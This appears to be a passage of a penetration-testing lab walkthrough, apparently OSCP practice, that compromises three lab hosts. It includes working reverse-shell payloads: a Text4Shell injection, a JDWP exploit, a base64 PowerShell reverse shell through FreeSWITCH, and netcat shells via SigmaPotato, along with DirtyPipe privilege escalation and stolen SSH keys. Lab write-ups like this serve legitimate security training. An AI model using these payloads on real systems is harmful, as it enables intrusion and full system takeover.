ftp>Found id_rsa file and downloaded it
ftp> ls
229 Entering Extended Passive Mode (|||10092|)
150 Here comes the directory listing.
-rwxr-xr-x 1 114 119 2590 Nov 21 2022 id_rsa
-rw-r--r-- 1 114 119 563 Nov 21 2022 id_rsa.pub
-rwxr-xr-x 1 114 119 2635 Nov 21 2022 id_rsa_2
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||10096|)
150 Opening BINARY mode data connection for id_rsa (2590 bytes).
100% |**********************************************************************************************************************************| 2590 12.60 MiB/s 00:00 ETA
226 Transfer complete.
2590 bytes received in 00:00 (34.42 KiB/s)Successfully authenticated to SSH as john using the id_rsa private key
┌──(kali🎃kali)-[~/oscp/149]
└─$ ssh john@192.168.162.149 -i id_rsa
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Last login: Tue Nov 22 08:31:27 2022 from 192.168.118.3
john@oscp:~$Read local.txt
john@oscp:~$ cat local.txt
93b73fcc70fa22d1422986943bbb9399Privilege Escalation
Executed linpeas and found exploitable CVEs
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops
Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
Exposure: probable
Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: less probable
Tags: ubuntu=(20.04|21.04),debian=11
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded Executed CVE-2022-0847 poc exploit and successfully escalated privileges to root
john@oscp:~/dirtypipe$ l
compile.sh exploit-1.c exploit-2.c
john@oscp:~/dirtypipe$ chmod 777 compile.sh
john@oscp:~/dirtypipe$ ./compile.sh
john@oscp:~/dirtypipe$ ll
total 68
drwxr-xr-x 2 john john 4096 Dec 22 06:28 ./
drwxr-xr-x 7 john john 4096 Dec 22 06:27 ../
-rwxrwxrwx 1 john john 71 Dec 22 06:27 compile.sh*
-rwxr-xr-x 1 john john 17624 Dec 22 06:28 exploit-1*
-rw-r--r-- 1 john john 5364 Dec 22 06:27 exploit-1.c
-rwxr-xr-x 1 john john 18040 Dec 22 06:28 exploit-2*
-rw-r--r-- 1 john john 7752 Dec 22 06:27 exploit-2.c
john@oscp:~/dirtypipe$ ./exploit-1
Backing up /etc/passwd to /tmp/passwd.bak ...
Setting root password to "piped"...
Password: Restoring /etc/passwd from /tmp/passwd.bak...
Done! Popping shell... (run commands now)
id
uid=0(root) gid=0(root) groups=0(root)Read proof.txt
ls
proof.txt snap
cat proof.txt
8b74eaa1f18d71c13cc32fef344a8af0192.168.162.150 - Berlin
Nmap
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxyInitial Access
Enumerated directories using gobuster and found accessible paths:
- search
- CHANGELOG
┌──(kali🎃kali)-[~/oscp/150]
└─$ gobuster dir -u http://192.168.162.150:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.162.150:8080
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/search (Status: 200) [Size: 25]
/error (Status: 500) [Size: 105]
/CHANGELOG (Status: 200) [Size: 194]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================Accessed the /CHANGELOG endpoint and identified the application is using “Apache Commons Text 1.8”, which is vulnerable to Text4ShellText4Shell (CVE-2022-42889)
┌──(kali🎃kali)-[~]
└─$ curl http://192.168.162.150:8080/CHANGELOG
# Changelog
Version 0.2
- Added Apache Commons Text 1.8 Dependency for String Interpolation
Version 0.1
- Initial beta version based on Spring Boot Framework
- Added basic search functionalityExecuted POC exploit
┌──(kali🎃kali)-[~/oscp/150]
└─$ curl http://192.168.162.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27busybox%20nc%20192.168.45.187%204444%20-e%20sh%27%29%7D%25
{"query":"${script:javascript:java.lang.Runtime.getRuntime().exec('busybox nc 192.168.45.187 4444 -e sh')}%","result":""}Successfully established reverse shell connection
┌──(kali🎃kali)-[~]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.162.150] 51490
id
uid=1001(dev) gid=1001(dev) groups=1001(dev)Read local.txt
dev@oscp:~$ ls
ls
local.txt
dev@oscp:~$ cat local.txt
cat local.txt
af8c3d8bb8d322ac20c2a3c1fc679112Privilege Escalation
Executed linpeas and found that JDWP service is running on port 8000 with root privileges and vulnerable to exploitation
- java -Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y /opt/stats/App.java
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes
root 1 0.0 0.6 167628 12960 ? Ss 03:16 0:01 /sbin/init
root 500 0.0 1.1 80664 24048 ? S<s 03:16 0:00 /lib/systemd/systemd-journald
root 541 0.0 1.3 354888 27364 ? SLsl 03:16 0:00 /sbin/multipathd -d -s
root 543 0.0 0.3 25736 6760 ? Ss 03:16 0:00 /lib/systemd/systemd-udevd
systemd+ 724 0.0 0.3 89352 6544 ? Ssl 03:17 0:00 /lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
root 733 0.0 0.5 51124 11936 ? Ss 03:17 0:00 /usr/bin/VGAuthService
root 734 0.0 0.4 315928 9800 ? Ssl 03:17 0:06 /usr/bin/vmtoolsd
systemd+ 820 0.0 0.3 16236 8068 ? Ss 03:17 0:00 /lib/systemd/systemd-networkd
└─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
systemd+ 822 0.0 0.6 25392 12260 ? Ss 03:17 0:00 /lib/systemd/systemd-resolved
└─(Caps) 0x0000000000002000=cap_net_raw
dev 841 1.1 26.3 2616740 533860 ? Ssl 03:17 2:31 java -jar /opt/dev/api.jar
dev 2273 0.0 0.0 2456 4 ? S 06:59 0:00 _ sh
dev 2275 0.0 0.1 7368 3464 ? S 07:00 0:00 _ /bin/bash
dev 2278 0.0 0.4 17480 8700 ? S 07:01 0:00 _ python3 -c import pty; pty.spawn("/bin/bash")
dev 2279 0.0 0.2 8692 5312 pts/0 Ss 07:01 0:00 _ /bin/bash
dev 2286 0.0 0.2 8692 5376 pts/0 S 07:01 0:00 _ /bin/bash
dev 2296 0.0 0.2 8584 5336 pts/0 S 07:02 0:00 _ /bin/bash
dev 2313 0.1 0.1 4004 2988 pts/0 S+ 07:03 0:00 _ /bin/sh ./linpeas.sh
dev 5625 0.0 0.0 4004 1204 pts/0 S+ 07:04 0:00 | _ /bin/sh ./linpeas.sh
dev 5629 0.0 0.1 10404 3784 pts/0 R+ 07:04 0:00 | | _ ps fauxwww
dev 5628 0.0 0.0 4004 1204 pts/0 S+ 07:04 0:00 | _ /bin/sh ./linpeas.sh
dev 2314 0.0 0.0 5772 1020 pts/0 S+ 07:03 0:00 _ tee linpeas
root 843 0.0 0.1 6892 3048 ? Ss 03:17 0:00 /usr/sbin/cron -f -P
message+ 845 0.0 0.2 8892 4680 ? Ss 03:17 0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
└─(Caps) 0x0000000020000000=cap_audit_write
root 852 0.0 0.9 32780 18496 ? Ss 03:17 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 853 0.0 0.3 234492 6692 ? Ssl 03:17 0:00 /usr/libexec/polkitd --no-debug
syslog 854 0.0 0.2 222400 5664 ? Ssl 03:17 0:00 /usr/sbin/rsyslogd -n -iNONE
root 856 0.0 1.4 1318624 28632 ? Ssl 03:17 0:00 /usr/lib/snapd/snapd
root 859 0.0 1.7 2528964 35288 ? Ssl 03:17 0:00 java -Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y /opt/stats/App.java
root 860 0.0 0.3 15024 6240 ? Ss 03:17 0:00 /lib/systemd/systemd-logind
root 862 0.0 0.6 392584 12908 ? Ssl 03:17 0:00 /usr/libexec/udisks2/udisksd
root 870 0.0 0.0 6172 1108 tty1 Ss+ 03:17 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root 894 0.0 0.5 317008 11820 ? Ssl 03:17 0:00 /usr/sbin/ModemManager
root 949 0.0 1.0 109756 20976 ? Ssl 03:17 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 1525 0.0 0.4 313340 8924 ? Ssl 04:45 0:00 /usr/libexec/upowerd
root 1797 0.0 0.9 295628 18600 ? Ssl 04:45 0:00 /usr/libexec/packagekitd
Downloaded exploit code
┌──(kali🎃kali)-[~/oscp/150]
└─$ searchsploit jdwp
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
Java Debug Wire Protocol (JDWP) - Remote Code Execution | java/remote/46501.py
-------------------------------------------------------------------------------------- ---------------------------------Set up SSH reverse port forwarding to access port 8000 from kali
dev@oscp:/$ ssh -f -N -R 8000:localhost:8000 kali@192.168.45.187
ssh -f -N -R 8000:localhost:8000 kali@192.168.45.187
The authenticity of host '192.168.45.187 (192.168.45.187)' can't be established.
ED25519 key fingerprint is SHA256:C/sPlE+2KjQOvOF6Xgy+YaE8+67OyeJHsui04dPIApU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])?
Host key verification failed.
dev@oscp:/$ ssh -f -N -R 8000:localhost:8000 kali@192.168.45.187
ssh -f -N -R 8000:localhost:8000 kali@192.168.45.187
The authenticity of host '192.168.45.187 (192.168.45.187)' can't be established.
ED25519 key fingerprint is SHA256:C/sPlE+2KjQOvOF6Xgy+YaE8+67OyeJHsui04dPIApU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
Warning: Permanently added '192.168.45.187' (ED25519) to the list of known hosts.
kali@192.168.45.187's password: kaliExecuted reverse shell listener
┌──(kali🎃kali)-[~/oscp]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...Executed POC
┌──(kali🎃kali)-[~/oscp]
└─$ ./ex.sh
{"query":"${script:javascript:java.lang.Runtime.getRuntime().exec('busybox nc 192.168.45.187 4444 -e sh')}%","result":""}
┌──(kali🎃kali)-[~/oscp]
└─$ python2 46501.py -t 127.0.0.1 -p 8000 --cmd 'busybox nc 192.168.45.187 9999 -e sh'
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.16'
[+] Found Runtime class: id=8b1
[+] Found Runtime.getRuntime(): id=7f395402e0a8
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'After POC execution, verified port 5000 was open and connected to it to trigger the event
dev@oscp:/$ ss -nltp
ss -nltp
State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 50 *:5000 *:*
LISTEN 0 100 *:8080 *:* users:(("java",pid=841,fd=11))
LISTEN 0 128 [::]:22 [::]:*
dev@oscp:/$ nc 127.0.0.1 5000
nc 127.0.0.1 5000POC event triggered, command executed, and successfully obtained reverse shell connection as root
┌──(kali🎃kali)-[~/oscp]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.162.150] 46746
whoami
root
id
uid=0(root) gid=0(root)Read proof.txt
root@oscp:/root# cat proof.txt
cat proof.txt
95319f177685c8ec21f6bc951aaeb599
root@oscp:/root# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.162.150 netmask 255.255.255.0 broadcast 192.168.162.255
ether 00:50:56:ab:f4:e3 txqueuelen 1000 (Ethernet)
RX packets 1677 bytes 166311 (166.3 KB)
RX errors 0 dropped 115 overruns 0 frame 0
TX packets 464 bytes 604716 (604.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8908 bytes 1268133 (1.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8908 bytes 1268133 (1.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0192.168.162.151 - Gust
Nmap
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
8021/tcp open ftp-proxyInitial Access
Searched for “8021/tcp open freeswitch-event FreeSWITCH mod_event_socket” and found it is vulnerable
Downloaded poc exploit using searchsploit
┌──(kali🎃kali)-[~/oscp/151]
└─$ searchsploit -m 47799
Exploit: FreeSWITCH 1.10.1 - Command Execution
URL: https://www.exploit-db.com/exploits/47799
Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/oscp/151/47799.txtExecuted POC exploit and confirmed the whoami command executed successfully
┌──(kali🎃kali)-[~/oscp/151]
└─$ python 47799.py 192.168.162.151 whoami
Authenticated
Content-Type: api/response
Content-Length: 11
oscp\chrisExecuted POC exploit to obtain reverse shell connection
┌──(kali🎃kali)-[~/oscp/151]
└─$ python 47799.py 192.168.162.151 "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAyACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="Successfully established reverse shell connection
┌──(kali🎃kali)-[~]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.162.151] 49430
PS C:\Program Files\FreeSWITCH>Read local.txt
PS C:\Users\chris\Desktop> dir
Directory: C:\Users\chris\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/22/2025 9:21 PM 34 local.txt
PS C:\Users\chris\Desktop> type local.txt
005c965265515e09dedb0509e532d642
PS C:\Users\chris\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.162.151
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.162.254Privilege Escalation
Found SeImpersonatePrivilege enabled
PS C:\Users\chris\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledExecuted SigmaPotato.exe to obtain privilege escalated reverse shell
PS C:\Users\chris\Desktop> .\SigmaPotato.exe 'nc64.exe 192.168.45.187 9999 -e cmd.exe'Successfully established reverse shell connection
┌──(kali🎃kali)-[~/Tools]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.162.151] 49639
Microsoft Windows [Version 10.0.19043.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>Read proof.txt
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 949E-5CA2
Directory of C:\Users\Administrator\Desktop
11/04/2022 06:48 AM <DIR> .
11/04/2022 06:48 AM <DIR> ..
12/22/2025 09:21 PM 34 proof.txt
1 File(s) 34 bytes
2 Dir(s) 15,095,418,880 bytes free
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
4041d6e03f48fcbc3775fbf1bc846962
C:\Users\Administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.162.151
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.162.254